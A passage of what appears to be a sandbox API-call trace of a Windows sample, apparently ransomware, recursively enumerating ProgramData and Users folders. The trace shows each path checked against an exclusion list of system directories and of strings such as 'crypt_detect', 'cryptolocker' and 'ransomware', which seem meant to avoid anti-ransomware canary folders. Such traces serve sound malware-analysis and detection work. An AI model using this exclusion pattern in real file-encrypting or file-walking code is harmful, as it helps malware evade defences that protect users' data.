cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.117] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Package Cache", cchMax=1054 | out: psz1="C:\\ProgramData\\Package Cache") returned="C:\\ProgramData\\Package Cache" [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\system32\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\system\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\local\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\boot\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\perflogs\\") returned 0x0 [0119.117] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Package Cache" [0119.117] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17d079d0, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3122174, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x53fba98c, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0119.117] StrCmpW (psz1="regid.1991-06.com.microsoft", psz2=".") returned 1 [0119.118] StrCmpW (psz1="regid.1991-06.com.microsoft", psz2="..") returned 1 [0119.118] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.118] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.118] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="regid.1991-06.com.microsoft", cchMax=1054 | out: psz1="C:\\ProgramData\\regid.1991-06.com.microsoft") returned="C:\\ProgramData\\regid.1991-06.com.microsoft" [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\local\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\boot\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\perflogs\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\programdata\\") returned=":\\ProgramData\\regid.1991-06.com.microsoft" [0119.118] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc31230fe, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SoftwareDistribution", cAlternateFileName="SOFTWA~1")) returned 1 [0119.118] StrCmpW (psz1="SoftwareDistribution", psz2=".") returned 1 [0119.118] StrCmpW (psz1="SoftwareDistribution", psz2="..") returned 1 [0119.118] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.118] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.118] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="SoftwareDistribution", cchMax=1054 | out: psz1="C:\\ProgramData\\SoftwareDistribution") returned="C:\\ProgramData\\SoftwareDistribution" [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\system32\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\system\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\local\\") returned 0x0 [0119.118] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\boot\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\perflogs\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\programdata\\") returned=":\\ProgramData\\SoftwareDistribution" [0119.119] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x7877b7ce, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x7877b7ce, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7877b7ce, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0119.119] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0119.119] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0119.119] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x7877b7ce, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x7877b7ce, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7877b7ce, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0119.119] StrCmpW (psz1="Templates", psz2=".") returned 1 [0119.119] StrCmpW (psz1="Templates", psz2="..") returned 1 [0119.119] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1931975, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x1931975, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOPrivate", cAlternateFileName="USOPRI~1")) returned 1 [0119.119] StrCmpW (psz1="USOPrivate", psz2=".") returned 1 [0119.119] StrCmpW (psz1="USOPrivate", psz2="..") returned 1 [0119.119] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.119] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.119] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="USOPrivate", cchMax=1054 | out: psz1="C:\\ProgramData\\USOPrivate") returned="C:\\ProgramData\\USOPrivate" [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\system32\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\system\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\local\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.119] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\boot\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\perflogs\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\programdata\\") returned=":\\ProgramData\\USOPrivate" [0119.120] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ade3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa4ade3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa4ade3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 1 [0119.120] StrCmpW (psz1="USOShared", psz2=".") returned 1 [0119.120] StrCmpW (psz1="USOShared", psz2="..") returned 1 [0119.120] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.120] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.120] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="USOShared", cchMax=1054 | out: psz1="C:\\ProgramData\\USOShared") returned="C:\\ProgramData\\USOShared" [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\system32\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\system\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\local\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\boot\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\perflogs\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\programdata\\") returned=":\\ProgramData\\USOShared" [0119.120] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xc32c07ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsHolographicDevices", cAlternateFileName="WINDOW~1")) returned 1 [0119.120] StrCmpW (psz1="WindowsHolographicDevices", psz2=".") returned 1 [0119.120] StrCmpW (psz1="WindowsHolographicDevices", psz2="..") returned 1 [0119.120] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0119.120] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0119.120] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="WindowsHolographicDevices", cchMax=1054 | out: psz1="C:\\ProgramData\\WindowsHolographicDevices") returned="C:\\ProgramData\\WindowsHolographicDevices" [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\system32\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.120] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\system\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\local\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\boot\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\perflogs\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\programdata\\") returned=":\\ProgramData\\WindowsHolographicDevices" [0119.121] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xc32c07ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsHolographicDevices", cAlternateFileName="WINDOW~1")) returned 0 [0119.121] FindClose (in: hFindFile=0xec1b30 | out: hFindFile=0xec1b30) returned 1 [0119.121] GetProcessHeap () returned 0xe30000 [0119.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0119.121] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28e9c3a2, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1044dfc5, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1044dfc5, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0119.121] StrCmpW (psz1="Recovery", psz2=".") returned 1 [0119.121] StrCmpW (psz1="Recovery", psz2="..") returned 1 [0119.121] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ead2556, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6ead2556, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xacefef79, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0119.121] StrCmpW (psz1="swapfile.sys", psz2=".") returned 1 [0119.121] StrCmpW (psz1="swapfile.sys", psz2="..") returned 1 [0119.121] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x6e16f135, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0xb1ff7ba5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb1ff7ba5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0119.121] StrCmpW (psz1="System Volume Information", psz2=".") returned 1 [0119.121] StrCmpW (psz1="System Volume Information", psz2="..") returned 1 [0119.121] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0119.121] StrCmpW (psz1="Users", psz2=".") returned 1 [0119.121] StrCmpW (psz1="Users", psz2="..") returned 1 [0119.121] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0119.121] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0119.121] StrNCatW (in: psz1="C:\\", psz2="Users", cchMax=1030 | out: psz1="C:\\Users") returned="C:\\Users" [0119.121] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\system32\\") returned 0x0 [0119.121] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\system\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\local\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\boot\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\perflogs\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\programdata\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\drivers\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\wsus\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="crypt_detect") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="cryptolocker") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="ransomware") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\WINDOWS") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.122] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\Program Files") returned 0x0 [0119.122] GetProcessHeap () returned 0xe30000 [0119.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x492) returned 0xf0daf8 [0119.122] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0119.122] StrNCatW (in: psz1="C:\\Users", psz2="\\*", cchMax=1042 | out: psz1="C:\\Users\\*") returned="C:\\Users\\*" [0119.123] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1d30 [0119.123] StrCmpW (psz1=".", psz2=".") returned 0 [0119.123] FindNextFileW (in: hFindFile=0xec1d30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.123] StrCmpW (psz1="..", psz2=".") returned 1 [0119.123] StrCmpW (psz1="..", psz2="..") returned 0 [0119.123] FindNextFileW (in: hFindFile=0xec1d30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0119.123] StrCmpW (psz1="All Users", psz2=".") returned 1 [0119.123] StrCmpW (psz1="All Users", psz2="..") returned 1 [0119.123] FindNextFileW (in: hFindFile=0xec1d30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0119.123] StrCmpW (psz1="Default", psz2=".") returned 1 [0119.123] StrCmpW (psz1="Default", psz2="..") returned 1 [0119.123] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0119.123] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0119.123] StrNCatW (in: psz1="C:\\Users\\", psz2="Default", cchMax=1042 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\system32\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\system\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\local\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\boot\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\perflogs\\") returned 0x0 [0119.123] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\programdata\\") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\drivers\\") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\wsus\\") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.124] StrStrIW (lpFirst="C:\\Users\\Default", 